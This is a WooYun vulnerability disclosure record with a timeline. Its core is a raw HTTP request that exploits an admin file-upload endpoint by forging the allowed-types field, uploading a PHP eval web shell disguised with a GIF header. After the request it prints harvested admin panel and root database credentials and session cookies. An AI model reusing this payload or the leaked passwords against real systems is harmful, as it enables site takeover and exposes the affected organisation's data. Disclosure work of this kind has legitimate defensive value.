WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online browsing--------http://drop.zone.ci/
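2016-01-05: Details reported to the vendor; awaiting vendor handling
2016-01-06: Vendor confirmed; details disclosed to the vendor only
2016-01-16: Details disclosed to core white hats and experts in related fields
2016-01-26: Details disclosed to regular white hats
2016-02-05: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public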
Sigh, Old Wang next door stole my iPhone
POST /admin.php?c=attachments&a=swfupload&dosubmit=1 HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
User-Agent: Shockwave Flash
Host: **.**.**.**
Content-Length: 1899
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: SpLangCookies=cn; _gscu_742156466=51819580yd5f5234; _gscs_742156466=51819580co97jm34|pv:1; PHPSESSID=540bb846e41d5c77a474d6c573169d44; zjuoluserid=Qg%3D%3D; zjuoladmin_email=HgscFxQ6EAAMD1QPERpCGQQ%3D; zjuoladmin_username=HgscFxQ%3D; zjuolatt_json=AUgUBghYUEdcWkhcRVxAWBkHDE5ASB0bGApQKUAwVR0CGEIAHxYMQh8OAEEPFDZaGhwWBRQLChMGEDNDSFpEWTBVWkRfWCZFR19dTFpEX1hKWERZWE1fQVZCEBoSTUBYDBwDCRQLGApOQEgBCgECRAUwBhdEFBwcX1k3QQYKDVcSEAYRVw4FHkhPWlVJXU1aWVZIBh0PWFBXBxgOGk8zQyZFAhgbVBAADA9UDxEaQhkEKUAZCgYaDggcAxkKMFVYRV5aJkVFXlxONlpdXEtcRV5cTlpHXVtIW0dbWFQABQhOVkgTBgAfBBQCCVhQVxdCEBoSTRE%3D

------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Filename"

a.cer
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="filetype_post"

aspx|aspx|asp|php5|docx|xls|xlsx|ppt|pptx|pdf|txt|rar|zip|swf
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="swf_auth_key"

429a371c17329d0af5c61ae3abead687
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="thumb_width"

0
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="dosubmit"

1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="thumb_height"

0
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="isadmin"

1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="watermark_enable"

1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="userid"

1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="groupid"

8
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="SWFUPLOADSESSID"

1451845655
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="catid"

10
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="siteid"

1
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="module"

content
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Filedata"; filename="a.PHP5"
Content-Type: application/octet-stream

<?php @eval($_POST['tom']);?>GIF89a<?php @eval($_POST['tom']);?><?php @eval($_POST[tom])?>
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1
Content-Disposition: form-data; name="Upload"

a
------------gL6GI3Ij5Ef1Ij5ei4KM7ae0KM7Ef1--
Admin panel account: daixx pass: amanda3020397
--------------------------------------
host => localhost
login => root
pass => zucc@xcb#2012 (root database password)
database=> zucc
prefix =>
---------------------------------------
Sigh, Old Wang next door stole my iPhone
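Sigh, Old Wang next door stole my iPhone. When will my Rank be enough to trade it back?
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2016-01-06 07:59
Notified; being handled
None yet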